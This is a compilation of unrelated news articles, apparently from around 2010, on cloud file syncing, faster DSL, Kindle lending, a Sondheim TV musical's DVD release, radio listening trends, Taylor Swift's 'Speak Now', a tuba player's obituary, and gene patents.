Microsoft, also trying to expand its cloud computing offerings, rolled out a service Sept. 31 called Live Mesh that provides 5 gigabytes of storage for free for individuals to sync and store their files, photos and videos in the cloud, making them available to any device, said Dharmesh Mehta, Director of Windows Live Product Management.

The pitfall with such services, analysts say, is the same question that hangs over cloud computing: security and privacy.

“How do you know where the information is going — whether it will be seen by your employer or insurance company?” said Jeffrey Mann, vice president of collaboration and social software with the research firm Gartner. “That’s a huge issue with lots of controversy.”

One rapidly growing service available internationally is SugarSync (www.sugarsync.com), which allows users to store, back up, sync, share and collaborate on data, music and photos and reach that information from any device, anywhere. The company’s offering is free for 2 gigabytes of storage and $9.99 a month for 60 gigabytes.

“We focus on digital chaos,” said Laura Yecies, the chief executive of SugarSync. “Our goal is to give a user a convenient and comprehensive solution, to have access and to manage all of her digital life.”

She said on-the-go professionals, like lawyers and architects, found the service indispensable. SugarSync is also available in four other languages, including Chinese. The company says 65 percent of its customers are in the United States, with the rest around the world.

One group eager to exploit such services is telecommunication companies. Katja Ruud, an analyst with Gartner in Stockholm, says revenue from cloud-based content management services could offset steep declines in traditional fixed-line calling.

A cloud-based address book called MyPhonebook and the ability to store e-mails, contacts, videos, photos and pretty much anything else possible are part of the Connected Life Experiences at Home offered by Deutsche Telekom. The package also provides people with Internet TV and a media center with online storage for films or other TV programs, and the files can be played by any device.

100 Mbps DSL is Here & 800 Mbps is Around the Corner
Om Malik

It is mind boggling to think that copper, thanks to new generation DSL technologies, is staying competitive with fiber and cable broadband. Today, a new breakthrough shows that it will only be a matter of time before DSL broadband crosses the 800 Mbps threshold. And while we wait for that massive speed bump, we are beginning to see the commercial availability of DSL that can deliver 100 Mbps.

These recent upgrades in the DSL speeds are coming at a handy time – DSL has started to lose market momentum, and carriers are looking for ways to balance their exploding capital expenditure requirements. While fiber networks are better in the long run, most phone companies need to squeeze out more from their copper networks without losing too much ground to cable broadband rivals. Why? Because they have to shift their capital expenditure dollars to beefing up wireless networks, which themselves are going through explosive growth.

Ikanos, a maker of broadband chips, today introduced a new technology, NodeScale Vectoring, a DSL access technology that allows connections at 100 Mbps and higher, something which has not been possible on many of the phone company networks. According to the chipmaker, the cost of deploying this technology is about a tenth of the cost of building a fiber to the home network.

The NodeScale technology allows carriers to eliminate the crosstalk that occurs on copper pairs when offering very high-speed Internet. The crosstalk introduces noise in the network, which in turn limits the line quality and thus reduces the performance of the network. Typically, to handle crosstalk issues, one needs gigabytes of memory. There are two ways of handling crosstalk. NodeScale essentially tames crosstalk at the DSLAM level, as opposed to line card vectoring, which treats every line card as a separate crosstalk domain.

Ikanos claims its NodeScale Vectoring technology cancels noise efficiently, and ZTE Corporation will demonstrate the first DSLAM employing the technology. The technology was developed in-house, but Ikanos also licensed the dynamic DSL technology developed by DSL pioneer John Cioffi’s ASSIA.

Back in 2006, Professor Cioffi (of Stanford University) told me that it would be possible to hit Gigabit speeds over DSL. We are inching pretty close to that. We have written about many experiments which have pushed DSL speeds to over 300 Mbps in lab conditions. Huawei, the Chinese telecom equipment maker, recently announced that it has tested speeds of up to 700 Mbps.

Today, Nokia Siemens Networks took that even further, announcing that it has tested a technology that could boost the data-carrying capacity of standard copper wires to 825 Mbps over a distance of 400 meters of bonded copper lines and 750 Mbps over a distance of 500 meters. If it is made commercial, it would allow the carriers to eke out more from their copper infrastructure.

NSN does this by the creation of phantom (or virtual) channels that “supplement the two physical wires that are the standard configuration for copper transmission lines.” The approach is called Phantom DSL and can boost bandwidth by between 50 percent and 75 percent over the existing bonded copper lines. NSN hopes to make it part of its DSLAM products. Alcatel-Lucent’s Bell Labs came up with the Phantom DSL technology and announced it back in April 2010.

Amazon Extends Value of Kindle with New Lending Feature
Tony Bradley

Amazon announced that it will soon update the Kindle software to allow users to lend and share Kindle books. The new feature is a welcome addition--catching the Kindle up with the rival Nook e-reader, and enhancing the value of the Kindle as a business tool.

The Kindle is marketed primarily as a consumer gadget, but it also offers a number of benefits and advantages as a business device. It is small and light--much more portable than a notebook, or netbook, or even a tablet device like the iPad. It is a cost-saving productivity tool that has a variety of valid business uses.

The Kindle is not marketed as a business tool, but it has many valid uses for business.

Rather than printing out hard copies of lengthy business documents, they can simply be converted to PDF and stored in the Kindle. Hefty reference sources such as Gray's Anatomy, or Dosage Calculation Practices for Nurses could be readily available in the palm of the hand--making them much more functional and valuable than a hardcover book sitting on a shelf somewhere.

The Kindle also offers the benefit of virtually ubiquitous cross-platform access that remains synced up between devices. Aside from the Kindle device itself, users can also access their Kindle library from a Windows or Mac PC, an iPhone, iPad, Android smartphone, or BlackBerry device. Kindle remembers where you're at in the book even as you switch between platforms, and notes and highlights are synced between them as well.

So, what's the big deal with the new lending feature? There are plenty of situations where an employee or co-worker might need to use a given title, but not forever. Since the need is temporary, one Kindle edition can be purchased by the business and farmed out to employees on an as-needed basis.

Details are sparse at this point on how the lending might work for proprietary documents like PDF files, and whether or not comments and highlighting are preserved as the document is shared, but assuming that is the case, the ability to lend such documents could enable teamwork and collaboration.

Just as with an actual book--you know, the kind made from bound paper--the owner of the Kindle e-book can not access or use the title while it is on loan. It is also not possible to loan the same book to more than one person at a time.

Amazon says that not all books will be eligible for lending, and also imposes a restriction (similar to the rival Barnes and Noble Nook) that the same book can not be loaned to the same person more than once. That is a limitation that hinders the value of lending in a business setting--since a user may need to reference the same shared title on more than one occasion.

’60s Sondheim TV Show Is Now on (Legal) DVD
Erik Piepenburg

Attention Stephen Sondheim groupies: You’ve lost bragging rights to your bootleg copies of “Evening Primrose.”

A digitally restored and remastered DVD of the 1966 television musical, holy grail for Sondheim completists, is being released on Tuesday — the first time the entire program will be available commercially to the public in any format.

The surreal 50-minute musical, adapted by James Goldman from a 1940 short story by John Collier, follows a poet named Charles Snell (a post-“Psycho,” still creepy Anthony Perkins), who becomes so disillusioned with the real world that he decides to make his home inside a New York City department store, with, as he sings, its “forty pianos and ten thousand shoes.”

Hiding out after hours he finds a community of eccentric hermits who evade security by pretending to be mannequins. Charles eventually falls in love with Ella (Charmian Carr, who played the oldest daughter in the film version of “The Sound of Music”), a maid being held against her will (long story). The two try to escape from the store but are hunted by the mysterious “dark men” so they won’t expose the secret society. “The story is whimsical, it’s quirky, and it’s macabre,” said Jane Klain, the manager of research services at the Paley Center for Media, who wrote the liner notes for the new DVD.

“Evening Primrose” was broadcast only once, on Nov. 16, 1966, on “ABC Stage 67,” the network’s short-lived cultural series. By that time Mr. Sondheim had already achieved success with “West Side Story,” “Gypsy” and “A Funny Thing Happened on the Way to the Forum.” But his most recent musicals, “Anyone Can Whistle” and “Do I Hear a Waltz?,” had received decidedly less acclaim.

Opportunities to see or hear “Evening Primrose” in its entirety since have been limited. Bootleg copies have circulated among Sondheim aficionados and on YouTube, and the Paley Center has a copy for viewing by appointment.

Thanks in part to a 2001 studio recording (with Neil Patrick Harris as Charles) and an original television soundtrack recording officially released in 2008, the song “Take Me to the World” has become well known. Barbara Cook sang it in the recent Broadway revue “Sondheim on Sondheim.”

And in what organizers are calling the musical’s North American premiere, a staged reading of “Evening Primrose,” starring Candice Bergen, is scheduled for Monday night at the Gerald W. Lynch Theater at John Jay College, as a benefit for the St. George’s Society of New York.

In a phone interview Mr. Sondheim said he was pleased that the musical was finally being released, even with its scrappy made-for-TV aesthetic. “It was my first experience with a musical for television, and that’s what was fun about it,” he said, adding that he hadn’t yet seen the restored edition.

While the original master tape, which was in color, has never been found, Ms. Klain used for the DVD a newly discovered black-and-white 16-millimeter copy that she said “had never been looked at.” Entertainment One is putting out the disc in partnership with the Archive of American Television, a program of the Academy of Television Arts & Sciences Foundation.

“Evening Primrose” offers Sondheim fans an early glimpse of what would become the composer’s signature style. There are complex rhythms and patter-heavy wordplay, for example, in the opening number, “If You Can Find Me, I’m Here”:

Farewell, Neanderthal neighbors

Swilling your pretzels and beer.

Fair-weather friends,

Will you miss me now?

If you can find me, I’m here.

According to the liner notes, the short taping time allotted for programs on “ABC Stage 67” required that book scenes be completed in single takes, giving the production the feeling of live television. Mr. Sondheim laughed when talking about the rough-and-tumble shooting schedule, pointing out a continuity lapse, visible in the DVD, in which a scarf that Charles wears in one scene of the opening number is suddenly not there in the next.

“It has a vaguely amateur feeling, which I like,” he said.

The DVD also provides a mini-snapshot of New York department-store history. Shots of Perkins walking among shoppers and riding an escalator were filmed one early Sunday morning on location at the old Stern Brothers department store on West 42nd Street. Paul Bogart, the director, explained in an interview included as a DVD extra that rehearsals were originally held at Macy’s but were moved after the retailer soured on the project for unknown reasons.

Ms. Klain suggested that Macy’s may have been worried about copycats trying to establish their own nocturnal society in the store.

“It’s a perfectly valid little fantasy,” said Mr. Sondheim, whose new book, “Finishing the Hat,” a collection of his lyrics and commentary, also comes out on Tuesday. “When you think about it, you can live your whole life in a department store. Everything you need is there, from food to clothes to bathrooms.”

Mr. Sondheim took a little blame for helping “Evening Primrose” make the rounds of the musical theater underground for so long.

“Most of the bootleg copies are out there,” he said, “because I lent it to people.”

Bridge Ratings Takes Radio Through The "Digital Gauntlet"

Bridge Ratings has released an extensive look at the effect of new media on terrestrial radio over the past 12 years, going back to the rise of Napster in the late '90s. Bridge surveyed 3822 persons ages 12-21, who currently listen to the radio, use an MP3 player, listen to Internet radio, use social networking sites, all for at least 30 minutes a week, along with regular cell phone use.

Bridge measured "favoriteness" of listeners ages 12+, looking at how many had a favorite radio station. In the late '90s, approximately 85 percent of the demo had a favorite station, but by 2010, this measurement has fallen to just over 72 percent of listeners.

The study shows a "tipping point" in radio listening that first happened between 2002-2003, but the "collective momentum" of digital alternatives to terrestrial radio hit a new point by 2007. In 2007, 12-21 year olds' usage of MP3 players overtook what Bridge calls the Bridge Ratings Index (the relationship between weekly radio listening (cume) and favoriteness).

Internet radio began to really impact between 2003-2005 and usage surpassed preference for terrestrial radio in 2006 among 12-21 year olds. Bridge also found that social networking sites passed 12-21 year olds' preference for radio by 2007 and labels it as the "killer activity" that has hurt TSL among younger demographics.

Pulling together the data, Bridge found that "each digital technology contributes to carving off affinity to radio and consumers find it more and more difficult to concentrate on one medium for their entertainment. Short attention span syndrome has been shown to be a function of the increase in multi-tasking by all age groups in recent years."

Bridge notes that there has been less attrition among 18-34 year-olds, though the multiple digital options out there also have taken a toll on this demographic's preference for terrestrial radio as well.

The study concludes that "Listener apathy also has played its part as sharing of music files in the early part of the decade boosted the sexy new tech of MP3 players on the young end while satellite radio's effective marketing blitz - spearheaded by XM in 2002-03 - painted that technology as the next generation of radio; adults have been more apt to adopt this technology. Satellite radio's strong two-year consumer love affair seemed to overshadow traditional radio in those years as the radio industry searched for revenue solutions that weren't necessarily linked to improving programming content."

"Once terrestrial radio en masse became more proactive by improving programming and marketing around 2005, this analysis shows that for certain demographics, there was an improvement to loyalty."

"This study has been both an exercise in historical perspective and an opportunity to expose the trends that have shaped the competitive landscape for terrestrial radio as new media is adopted over time by the public. Listening levels will continue to be affected by the introduction of new technologies and the adoption by a growing number of consumers of more recent audio tech improvements. As this analysis attests, traditional radio is more resilient than the press would have many believe."

NAB Endorses Conditions For Performance Royalty

The NAB Radio Board of Directors has voted in favor of a legislative "Term Sheet" tackling the thorny performance rights issue, which will be presented to the musicFIRST coalition.

"NAB remains 100 percent opposed to performance fee legislation pending in Congress," said NAB Radio Board Chair Caroline Beasley, CFO of Beasley Broadcast Group. "However, in a good faith effort to resolve this issue in the best interests of both radio and the music industry, we have endorsed a solution ensuring that broadcasters have a foothold in digital platforms of tomorrow."

"Today's endorsement includes provisions that are essential to the future of free and local radio, and we're hopeful that the musicFIRST Coalition finds it in their best interest to say 'yes' to this proposal," Beasley added.

Under the Term Sheet, music-playing terrestrial radio stations would agree to pay a limited performance fee, which would be set at between 0.25 and one percent of a station's net revenue, depending on a provision related to the penetration of radio-activated mobile phones in the U.S. Today's endorsement from the NAB Radio Board was made with the understanding that any legislative resolution supported by NAB must include the following:

-- Permanent removal of the Copyright Royalty Board from rate-setting of transmissions of terrestrial on-air music or Internet streaming;

-- Resolution of the "AFTRA issue" outside of the legislative process by the musicFIRST coalition that would facilitate simulcast of over-the-air radio commercials on the Internet;

-- musicFIRST's acknowledgment and recognition of the unparalleled promotional value of terrestrial radio airplay;

-- Simplified airplay reporting requirements similar to the model used by ASCAP/BMI;

-- Congressionally-mandated radio-activated chips in mobile devices such as cell phones and BlackBerry smartphones, with an acceptable phase-in period and inclusion of HD Radio chips when economically feasible. If a legislative mandate (which musicFirst has agreed to support) becomes initially unattainable, radio broadcasters would agree to an initial performance fee payment of 0.25 percent of net industry revenue. Under this scenario, the performance fee would mirror the actual percentage of radio-activated mobile phones in the United States. Once market penetration of radio-activated mobile devices reaches and maintains a level of 75 percent of all mobile devices, broadcasters agree to pay the full one percent terrestrial transmission performance fee.

-- Assuming a successful mandate of radio-activated chips in mobile devices, streaming rates that broadcasters pay for simulcasts, webcasts and other non-terrestrial transmissions of music through 2016 would be reduced. In the event that a legislative mandate for radio chips in mobile devices is not achieved, the streaming rate reduction would not take effect until 50 percent of mobile phones have radio chips.

The Term Sheet provides accommodations for small radio station operators, noncommercial stations, religious broadcasters and incidental uses of music by News/Talk and Sports stations.

The Term Sheet also envisions that both the radio and music industry will work cooperatively to offer consumers more and better ways to listen to music.

"From a position of strength, we have fashioned a Term Sheet for resolving the performance fee issue that in the long run is acceptable for radio," said NAB Joint Board Chairman Steve Newberry, President/CEO of Commonwealth Broadcasting. "No broadcaster that I know relishes paying a new fee, but the terms of this agreement provide badly needed certainty for our business to move forward, and the positives of this accord far out-weigh the negatives."

NAB President/CEO Gordon Smith said the Term Sheet "represents a path forward for radio broadcasters and musicFirst to resolve this contentious issue in a manner that is fair and equitable to both sides. Radio stations, artists and the record labels have more commonalities than differences, and adoption of legislation that reflects this Term Sheet will provide a framework for untold new revenue opportunities for both sides. We look forward to working with musicFIRST and its allies for swift legislative adoption of this entire package of initiatives that will help our businesses flourish in the digital age."

Taylor Swift Is Angry, Darn It
Jon Caramanica

FOR pure star-on-star revenge, “Dear John,” from the new Taylor Swift album, “Speak Now,” will be tough to beat. Six and a half minutes long and flagrantly provocative, it’s a deeply uncomfortable song, its protagonist anguished and violated. “Don’t you think I was too young to be messed with?” she asks. “The girl in the dress/Cried the whole way home.”

John Mayer has brought this out in Ms. Swift, awakening her pain, her ire and her creativity. Rather than write a song in her familiar country-pop mode, she’s written an electric blues, its pealing guitar licks a hilarious and pointed reminder of Mr. Mayer, who’s a master of the style. It’s warfare on the level of Jay-Z versus Nas, Oasis versus Blur, Carly Simon versus whomever. (It might explain why, according to Ms. Swift’s Twitter feed, she and her family were recently debating who “You’re So Vain” was about.)

Of course, this being the coy, evasive Ms. Swift, the name John Mayer is never uttered on this song, just as she didn’t say it during a lengthy interview in Nashville last month, just as she will likely never fully confess that the John of the title is Mr. Mayer, with whom she has performed and who tabloids reported she was involved with earlier this year. Still, whatever he did — or whatever Ms. Swift would like to suggest that he did — must have been brutal:

You’ll add my name to the long list of traitors

Who don’t understand

And I’ll look back and regret how I ignored when they said

“Run as fast as you can!”

“I feel like in my music I can be a rebel,” Ms. Swift said at a quiet restaurant not far from her new Nashville apartment. “I can say things I wouldn’t say in real life. I couldn’t put the sentence together the way I could put the song together.” In interviews she’s like her songs, almost revealing. Her communication about communication is as strong as ever.

Ms. Swift, while wide-eyed and easily awestruck, is prim and difficult to ruffle. She is still sometimes treated with kid gloves, as if she were a child star, but Ms. Swift is an adult now; she’ll turn 21 in December. Still, if this is what this preternaturally wise teen star turned 21st-century multimedia celebrity is developing into, bring it on. She is her own TMZ, “Fatal Attraction” by way of Hannah Montana.

“Dear John” is by far the most scorching track on “Speak Now” (Big Machine), which is out on Monday, though plenty of the rest of the album stings. It’s the most savage of her career, and also the most musically diverse. And it’s excellent too, possibly her best.

“Speak Now” is also a bravura work of nontransparent transparency. “I second-guess and overthink and rethink every single thing that I do,” she said.

The album touches on many of the major public events in Ms. Swift’s life the last two years — her conflict with Kanye West at the 2009 MTV Video Music Awards, the sprouting criticisms of her live singing voice, a romantic relationship with the actor Taylor Lautner, rumored dalliances with Mr. Mayer and others — without naming names, relying on fans, critics and tabloids to fill in the blanks.

The great accomplishment of this album, though, is that Ms. Swift is at her most musically adventurous when she’s most incensed. She may not be outgrowing the ethos of tit for tat — righting wrongs is Ms. Swift’s raison d’être — but as an artist, she’s finding new ways to fight back.

This may not have been an inevitability, but it was definitely a necessity. So much has happened in the two years since the release of “Fearless,” Ms. Swift’s second album, that running in place wasn’t an option. Her musical life, which she has advertised as autobiographical since her first single, “Tim McGraw,” four years ago, depends on her version of truth telling. But now that so much of her life unfolds in the public eye, she can’t merely trust that listeners will take her word for things. Hers isn’t the only narrative.

On her first album, “Taylor Swift,” and, to a degree, on “Fearless,” she had little more to do than share her adolescent imagination. Even her darker songs were about poking the hole in the ideal more than any actual trauma. But experience is gaining on her. “This whole apparent growing up that happens,” she called it, with comic dismissal.

In these new songs relationships are no longer fantasies, or neutered; they’re lived-in places, where bodies share space.

“I’ll watch your life in pictures like I used to watch you sleep,” she tells an ex on “Last Kiss.” Other beds are in play too. “She’s not a saint/And she’s not what you think,” she spits out on “Better Than Revenge,” seething over losing someone to a predatory woman. “She’s an actress/But she’s better known for the things that she does on the mattress.”

It’s jarring to hear Ms. Swift talk like that, just like it’s jarring to hear the overwhelming distress of “Dear John,” or “Mean,” a response to a vicious critic. “You have pointed out my flaws again/As if I don’t already see them,” she sings, over a bluegrass-influenced acoustic track unlike anything else she’s yet recorded. Like “Dear John” it takes real-world emotional pain and transforms it into clever art, her choice to go more or less unplugged a slap in the face of doubters.

“Speak Now” also heralds the full arrival of her longtime collaborator Nathan Chapman as a first-rate producer, and not just of the pop-country that’s made Ms. Swift one of the most important new musicians of the decade. He sounds equally comfortable with the blues of “Dear John,” the rootsy sound of “Mean,” the pop-punk of “The Story of Us” and “Better Than Revenge,” and the bruised, anthemic arena-rock of “Haunted.”

That range is likely to be Ms. Swift’s new normal, or the jumping-off point for even more experimentation. The Nashville establishment needs Ms. Swift — a multiplatinum superstar who was the first solo female country singer to win an Album of the Year Grammy, one of four she won earlier this year — far more than she needs it, which means there’s no obstacle to her music becoming country in gesture only.

Certainly there’s no country precedent for a song like “Innocent,” her loving, moody scolding of Mr. West, which had its debut at the MTV Video Music Awards in September.

The incident with Mr. West last year was the first time Ms. Swift’s air of invincibility had been punctured. In a moment she went from grateful and glowing to tough and callused.

In the last year especially, she’s become fair game for the tabloids, which have linked her with Mr. Mayer and Cory Monteith of “Glee” in addition to her exes Mr. Lautner and Joe Jonas of the Jonas Brothers. (Us Weekly is creating a stand-alone issue devoted solely to her, an acknowledgment of her drawing power on the newsstand, and maybe also an act of collaborative savvy on the part of Ms. Swift.)

And after some spotty televised live performances, like her duet with Stevie Nicks at the Grammy Awards, she’s become fair game for critics too. “I’m always going to care,” she said of the backlash. “There’s never going to be a time where I’m going to be nonchalant or casual.” She still takes vocal lessons, and in an incident documented on the blog of the industry pundit Bob Lefsetz, she personally called him after he’d written negative things.

“One of those fears that I never really let myself think is, ‘Is that good because I’m 18?’ ”

Silence, though, is Ms. Swift’s real weapon. In conversation she picks up threads that suit her mood, letting others go. (On whether she’s a feminist: “I have never really thought about that.”) In concert she stands for long periods gazing doe eyed at the crowd as it cheers her, her quiet a signal to remain loud. Even her virtual presence has down moments. Her Twitter feed was notably silent in the days after the 2009 VMAs. “Sometimes you just don’t know what to say, so you don’t say anything,” she said.

While she’s articulate in song, she admits to struggling with feelings in her day-to-day life. “I can say them at a business meeting,” she said of being direct with words. “But for me, saying them to a person that I really care about in whatever sense, whatever capacity, is a little tougher, because it doesn’t have a first verse, second verse and bridge.”

Ms. Swift still believes in the value of the last word; she’s a far better monologuist than dialoguist. And yet her new adversaries aren’t the anonymous crushes of her high school years, probably thrilled just to be alluded to in song, even with darts. They’re celebrities who want to tell their own stories, and undoubtedly will.

At the 2010 Video Music Awards last month Mr. West was able to steal the narrative back from Ms. Swift. Midway through the show she performed “Innocent,” but he closed the show with “Runaway,” which celebrated his boorishness by poking fun at it. His wit trumped her sobriety, a rare loss.

And that’s probably just the beginning. Maybe Mr. Lautner or Mr. Jonas will someday spill the beans about his time with Ms. Swift on “The Howard Stern Show” or in a GQ cover story. After all, their stories don’t only belong to her, and she can only police her own boundaries.

And certainly something loud can be expected of the logorrheic Mr. Mayer, who is probably already working on his cover version of “Dear John,” or maybe even an answer song.

Asked about the possibility, Ms. Swift appeared concerned. “What do I do now?” she said, her brow furrowing for just a second. “I haven’t thought about this.”

Harvey Phillips, a Titan of the Tuba, Dies at 80
Daniel J. Wakin

The tuba players mass by the hundreds every year on the Rockefeller Center ice-skating rink to play carols and other festive fare, a holiday ritual now ingrained in the consciousness of New York.

The tradition began in 1974, the brainchild of Harvey Phillips, a musician called the Heifetz of the tuba. In his time he was the instrument’s chief evangelist, the inspirer of a vast solo repertory, a mentor to generations of players and, more simply, Mr. Tuba.

Most tuba players agree that if their unwieldy instrument has shed any of the bad associations that have clung to it — orchestral clown, herald of grim news, poorly respected back-bencher best when not noticed, good for little more than the “oom” in the oom-pah-pah — it is largely thanks to Mr. Phillips’s efforts. He waged a lifelong campaign to improve the tuba’s image.

Mr. Phillips died on Wednesday at his home, Tubaranch, in Bloomington, Ind., his wife, Carol, said. He was 80 and had Parkinson’s disease.

Like many towering exponents of a musical instrument, Mr. Phillips left a legacy of new works, students and students of students. But even more, he bequeathed an entire culture of tuba-ism: an industry of TubaChristmases (252 cities last year) and tuba minifestivals, mainly at universities, called Octubafests.

“The man was huge in putting the instrument on the map as a solo instrument,” said Alan Baer, the New York Philharmonic’s tuba player, two of whose teachers were Phillips students. “Our repertory is so limited, and it would be horrible if he had not done the amount of work that he did.”

Mrs. Phillips said her husband had either commissioned or inspired more than 200 solo and chamber music pieces, many wheedled out of composers by persistence or other methods. “I remember Persichetti was a case of Beefeater gin,” she said of the composer Vincent Persichetti.

Mr. Phillips once said, “I’m determined that no great composer is ever again going to live out his life without composing a major work for tuba.”

Harvey Phillips was born on Dec. 2, 1929, the last of 10 children, in an Aurora, Mo., farming family. The family moved often, and he attended high school in Marionville, Mo.

After graduating, Mr. Phillips took a summer job playing tuba with the King Bros. Circus. He left to attend the University of Missouri but was quickly lured away by another circus offer: playing tuba with the Ringling Brothers and Barnum & Bailey Circus. It was the pinnacle of circus bands.

One of the band’s duties was to give “alarms”: play pieces to alert circus staff in the case of, say, a high-wire accident. “Twelfth Street Rag” was the alarm for that, a signal to send in the clowns to distract the audience, Mr. Phillips said in a New Yorker profile in 1976. He spent three years with the Ringling band.

On a circus trip to New York, where he played duets with the clanging pipes in his hotel room, Mr. Phillips met William Bell, the tuba player of the New York Philharmonic. Mr. Bell soon arranged for him to study at the Juilliard School and become his pupil.

Mr. Phillips spent two years in the United States Army Field Band in Washington but returned to New York, drawn by the many opportunities. He became a successful freelancer, playing regularly with the New York City Opera and New York City Ballet orchestras, recording and making broadcasts.

In 1954 he helped found the New York Brass Quintet. The combination (two trumpets, French horn, trombone and tuba) was less common at the time than it later became. Brass quintets proliferated, a boon for tuba players, because brass players on university faculties needed a tubist colleague to form a group. More tuba professors meant more tuba students.

Mr. Phillips also played jazz, performing in clubs and recital halls. As his reputation grew, composers began writing for him, and Mr. Phillips introduced another rarity, the tuba recital. In 1975 he played five recitals at Carnegie Recital Hall in nine days.

Writing in The New York Times in 1980, the music critic Peter G. Davis said first-time listeners to Mr. Phillips “could scarcely fail to be impressed, and probably not a little astonished, by the instrument’s versatility and tonal variety, its ability to spin a soft and sweetly lyrical melodic line, to dance lightly and agilely over its entire bass range, and to bellow forth with dramatic power when the occasion demands.”

Mr. Phillips’s entrepreneurial abilities emerged in his New York years, too. He served as the orchestra contractor for Leopold Stokowski, Igor Stravinsky and Gunther Schuller, among others. When Mr. Schuller took charge of the New England Conservatory of Music in Boston, he recruited Mr. Phillips as vice president for financial affairs. Mr. Phillips held the position from 1967 to 1971, commuting to New York for evening performances.

The punishing routine took away from practice and family time. Coming home late one night and missing his family, he took out his tuba while his wife and two of his children slept in the bed nearby and practiced until dawn, playing so softly that they did not wake up, according to the New Yorker profile.

He often practiced in the backseat of his car while his wife drove and their children kept eyes on the road to warn of approaching potholes. “They would yell, ‘Daddy, bump!’ ” Ms. Phillips said.

In addition to Ms. Phillips, Mr. Phillips is survived by their sons, Jesse, Harvey Jr. and Thomas.

In 1971 Mr. Phillips joined the faculty of Indiana University. He retired in 1994.

In his tireless efforts to raise the tuba’s profile as well as to honor Mr. Bell, his teacher, Mr. Phillips — perhaps touched by the showmanship of his circus past — decided to gather tuba players for a special holiday concert in Rockefeller Center. (Mr. Bell was born on Christmas Day, 1902.)

He called an official there with the suggestion. “The phone went silent,” he later recounted. “So I gave the man some unlisted telephone numbers of friends of mine.” They included Stokowski, Leonard Bernstein, André Kostelanetz and Morton Gould. “He called me back in about an hour and said, ‘I’ve spoken with your friends, and you can have anything you want.’ ”

The Tuba Christmas extravaganzas took off. Volunteers hold them around the country under the auspices of the Harvey Phillips Foundation. Sousaphones and euphoniums are also welcome.

At the tubafests, the musicians play “Silent Night” in honor of their fellows who have died, Mrs. Phillips said. On Dec. 8 when tuba players gather again at the skating rink, the carol will be played in Mr. Phillips’s memory.

Click Here to Resurrect the Dead: 3D Printing Brings Pharaoh Back to Death
Curt Hopkins

How do you solve a problem like Tutankhamun? Well, if you need to ship his leathery hide around the world - something which would risk damage and sovereignty - you print him of course. In this case, you use 3D printing to create a life-like, or in this case death-like, copy in three dimensions.

Egypt's Supreme Council of Antiquities employed a CT scanner to map the ancient pharaoh's body, all the way through, then used a Materialise Mammoth Stereolithograph to produce an identical copy in the round.

Primarily used for prototyping and small-production runs, the machine uses a photopolymer resin to form the product, in sections about six feet in length. The CT scans are imported and rendered using Materialise's software. Lasers guide the shape, laying down thin sheets until they build up into the figure. A modeler finishes, adding texture and color.

The fake Tut is accurate (or inaccurate depending on your point of view) right down to the famous missing micro-wang.

With all of Howard Carter's Tutankhamun excavation material now available online, and 3D printing technology getting more common, I wonder if there will come a time when you can print out your own desktop Tut or other historical remains and artifacts in order to better understand them? That'd be cool.

Watch this video on the printing of a pharaoh. It's a nice creepy cross between the Alien films and Dan Simmons' Hyperion Cantos.

U.S. Says Genes Should Not Be Eligible for Patents
Andrew Pollack

Reversing a longstanding policy, the federal government said on Friday that human and other genes should not be eligible for patents because they are part of nature. The new position could have a huge impact on medicine and on the biotechnology industry.

The new position was declared in a friend-of-the-court brief filed by the Department of Justice late Friday in a case involving two human genes linked to breast and ovarian cancer.

“We acknowledge that this conclusion is contrary to the longstanding practice of the Patent and Trademark Office, as well as the practice of the National Institutes of Health and other government agencies that have in the past sought and obtained patents for isolated genomic DNA,” the brief said.

It is not clear if the position in the legal brief, which appears to have been the result of discussions among various government agencies, will be put into effect by the Patent Office.

If it were, it is likely to draw protests from some biotechnology companies that say such patents are vital to the development of diagnostic tests, drugs and the emerging field of personalized medicine, in which drugs are tailored for individual patients based on their genes.

“It’s major when the United States, in a filing, reverses decades of policies on an issue that everyone has been focused on for so long,” said Edward Reines, a patent attorney who represents biotechnology companies.

The issue of gene patents has long been a controversial and emotional one. Opponents say that genes are products of nature, not inventions, and should be the common heritage of mankind. They say that locking up basic genetic information in patents actually impedes medical progress. Proponents say genes isolated from the body are chemicals that are different from those found in the body and therefore are eligible for patents.

The Patent and Trademark Office has sided with the proponents and has issued thousands of patents on genes of various organisms, including on an estimated 20 percent of human genes.

But in its brief, the government said it now believed that the mere isolation of a gene, without further alteration or manipulation, does not change its nature.

“The chemical structure of native human genes is a product of nature, and it is no less a product of nature when that structure is ‘isolated’ from its natural environment than are cotton fibers that have been separated from cotton seeds or coal that has been extracted from the earth,” the brief said.

However, the government suggested such a change would have limited impact on the biotechnology industry because man-made manipulations of DNA, like methods to create genetically modified crops or gene therapies, could still be patented. Dr. James P. Evans, a professor of genetics and medicine at the University of North Carolina, who headed a government advisory task force on gene patents, called the government’s brief “a bit of a landmark, kind of a line in the sand.”

He said that although gene patents had been issued for decades, the patentability of genes had never been examined in court.

That changed when the American Civil Liberties Union and the Public Patent Foundation organized various individuals, medical researchers and societies to file a lawsuit challenging patents held by Myriad Genetics and the University of Utah Research Foundation. The patents cover two genes, BRCA1 and BRCA2, and the over $3,000 analysis Myriad performs on the genes to see if women carry mutations that predispose them to breast and ovarian cancers.

In a surprise ruling in March, Judge Robert W. Sweet of the United States District Court in Manhattan ruled the patents invalid. He said that genes were important for the information they convey, and in that sense, an isolated gene was not really different from a gene in the body. The government said that that ruling prompted it to re-evaluate its policy.

Myriad and the University of Utah have appealed.

Saying that the questions in the case were “of great importance to the national economy, to medical science and to the public health,” the Justice Department filed an amicus brief that sided with neither party. While the government took the plaintiffs’ side on the issue of isolated DNA, it sided with Myriad on patentability of manipulated DNA.

Myriad and the plaintiffs did not comment on the government’s brief by deadline for this article.

Mr. Reines, the attorney, who is with the firm of Weil Gotshal & Manges and is not involved in the main part of the Myriad case, said he thought the Patent Office opposed the new position but was overruled by other agencies. A hint is that no lawyer from the Patent Office was listed on the brief.

Turning Customers Into Creators
Jenna Wortham

A FEW young women are gathered around a conference table dotted with bottles of colorful vitamin drinks, iPod cables and slender laptops. A whiteboard with lime-green writing almost swallows a wall in the room.

One bites her lip; another taps lightly on the table. They’re all quiet, deep in thought, as they decide whether it would be a good idea to add a music feature to the Web site they’re working on — a new online shopping site called PlumWillow.

“The problem,” says one of them, Sarah Murphy, “is that there are so many genres of music that it’d be hard to get it right what people want to listen to.”

“Right,” Carla Larin concurs, tossing her wavy brown hair. “But it’d be cool to have, like, a PlumWillow station full of songs we think are cool.”

None of these girls are the company’s founders, nor are they social media consultants. They aren’t at PlumWillow’s office for “take your daughter to work day,” either.

